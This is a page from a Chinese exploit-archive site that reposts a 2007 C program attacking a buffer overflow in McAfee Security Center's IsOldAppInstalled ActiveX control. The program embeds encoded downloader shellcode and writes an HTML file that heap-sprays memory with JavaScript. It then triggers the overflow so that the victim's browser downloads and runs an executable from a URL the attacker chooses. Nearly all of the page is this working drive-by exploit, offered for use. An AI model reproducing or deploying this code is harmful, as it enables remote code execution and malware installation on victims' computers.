首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 McAfee Security Center IsOldAppInstalled ActiveX BoF Exploit 来源：www.vfocus.net 作者：Jambalaya 发布时间：2007-05-11   /* McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability Peel the frame from axis,Thanks Test on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15 Greetz to OYXin, sowhat, Winny Thomas and 0x557 team */ #include <stdio.h> #include <stdlib.h> #include <string.h> FILE *fp = NULL; char *file = "McAfee_exploit.html"; char *url = NULL; //Downloader shellcode unsigned char sc[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x3c\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x34\x99\x99\x99\xC3\x12\x6B\xAA" "\x59\x35\xA4\x01\x99\x99\x99\xEC\x6F\x18\x75\x51\x99\x99\x99\x12" "\x6D\x10\xCF\xBD\x71\x0C\x99\x99\x99\xAA\x42\x10\x9F\x66\xAF\xF1" "\x17\xD7\x97\x75\x71\x34\x99\x99\x99\x10\xDF\x91\xF1\xF5\xF5\x99" "\x99\xF1\xF6\xF7\xB7\xFD\xF1\xEC\xEB\xF5\xF4\xCD\x66\xCF\x91\x10" "\xDF\x9D\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x11\x99\x99\x99\x10\xDF" "\x95\x66\xAF\xF1\x01\x67\x13\x97\x71\xE0\x99\x99\x99\x10\xDF\x8D" "\x66\xAF\xF1\xBC\x29\x66\x5B\x71\xF3\x99\x99\x99\x10\xDF\x81\x66" "\xEF\x9D\xF1\xAF\x83\xB6\xE9\x71\xC3\x99\x99\x99\x10\xDF\x89\xF3" "\xFC\xF1\xEA\xB7\xFC\xE1\x10\xFF\x85\x66\xEF\x85\x66\xCF\x81\xAA" "\x50\xC8\xC8\x66\xEF\x85\x66\xEF\xBD\xC8\x66\xCF\x89\xAA\x50\xC8" "\x66\xEF\x85\x66\xCF\x8D\x66\xCF\x95\x70\x19\x99\x99\x99\xCC\xCF" "\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12\xE9\x85" "\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99\x99\x12" "\x5C\xC7\xC4\x5B\x9D\x99\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC" "\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A\x44\x7A" "\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3\x5D\xED" "\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3" "\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A" "\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99\x71\x50" "\x67\x66\x66"; unsigned char sc_2[] = "\x98"; char * header = "<!-- McAfee exploit:) Jambalaya-->\n\n" "<html>\n" "<object classid=\"clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602\" id='target'></object>\n" "<body>\n" "<SCRIPT language=\"javascript\">\n" "\tvar heapSprayToAddress = 0x05050505;\n" "\tvar shellcode = unescape(\"%u9090\"+\"%u9090\"+ \n"; char * footer = "\n" "var heapBlockSize = 0x400000;\n" "var payLoadSize = shellcode.length * 2;\n" "var spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n" "var spraySlide = unescape(\"%u0505%u0505\");\n" "spraySlide = getSpraySlide(spraySlide,spraySlideSize);\n" "heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\n" "memory = new Array();\n\n" "for (i=0;i<heapBlocks;i++)\n{\n" "\t\tmemory[i] = spraySlide + shellcode;\n}\n" "var padding = String.fromCharCode(0x05);\n" "while( padding.length< 500)\n" "{\npadding +=padding;\n}\n" "var str = padding.substring(0,500);\n" "var arg2=\"defaultV\";\n" "target.IsOldAppInstalled(str, arg2);\n" "function getSpraySlide(spraySlide, spraySlideSize)\n{\n\t" "while (spraySlide.length*2<spraySlideSize)\n\t" "{\n\t\tspraySlide += spraySlide;\n\t}\n" "\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\n\treturn spraySlide;\n}\n\n" "</script>\n"; char * trigger_1 = "</body>\n" "</html>\n"; // print unicode shellcode void PrintPayLoad(char *lpBuff, int buffsize) { int i; for(i=0;i<buffsize;i+=2) { if((i%16)==0) { if(i!=0) { printf("\"\n\""); fprintf(fp, "%s", "\" +\n\""); } else { printf("\""); fprintf(fp, "%s", "\""); } } printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]); fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]); } printf("\";\n"); fprintf(fp, "%s", "\");\n"); fflush(fp); } void main(int argc, char **argv) { unsigned char buf[1024] = {0}; int sc_len = 0; int n; if (argc < 2) { printf("#######################################\n"); printf("#\tMcAfee Security Center IsOldAppInstalled exploit by Jambalaya:>\n"); printf("#\ttest on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15:>\n"); printf("#\tReference : http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/054183.html\n"); printf("#\t100%% successful\? who knows\;\)\n"); printf("\r\nUsage: %s <URL> [htmlfile]\n", argv[0]); printf("\r\nE.g.: %s http://www.fakename.com/hello.exe exploit.html\r\n\n", argv[0]); exit(1); } url = argv[1]; if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) { printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); return; } printf("[+] download url:%s\n", url); if(argc >=3) file = argv[2]; printf("[+] exploit file:%s\n", file); fp = fopen(file, "w"); if(!fp) { printf("[-] Open file error!\n"); return; } //build evil html file fprintf(fp, "%s", header); fflush(fp); memset(buf, 0, sizeof(buf)); sc_len = sizeof(sc)-1; memcpy(buf, sc, sc_len); memcpy(buf+sc_len, url, strlen(url)); sc_len += strlen(url); memcpy(buf+sc_len, sc_2, 1); sc_len += 1; PrintPayLoad((char *)buf, sc_len); fprintf(fp, "%s", footer); fflush(fp); fprintf(fp, "%s", trigger_1); fflush(fp); printf("[+] exploit write to %s success!\n", file); }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·MS Internet Explorer <= 7 Remo ·notepad++ 4.1 ruby file proces ·TaskDriver <= 1.2 Login Bypass ·webdesproxy 0.0.1 (GET Request ·Gimp 2.2.14 .RAS File Download ·VImpX ActiveX (VImpX.ocx v. 4. ·Helix Server Vsrc3260.dll Remo ·webdesproxy 0.0.1 (GET Request ·Fenice OMS server 1.10 Remote ·TinyIdentD <= 2.2 Remote Buffe ·TCExam <= 4.0.011 (SessionUser ·Eudora 7.1 SMTP ResponseRemote   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved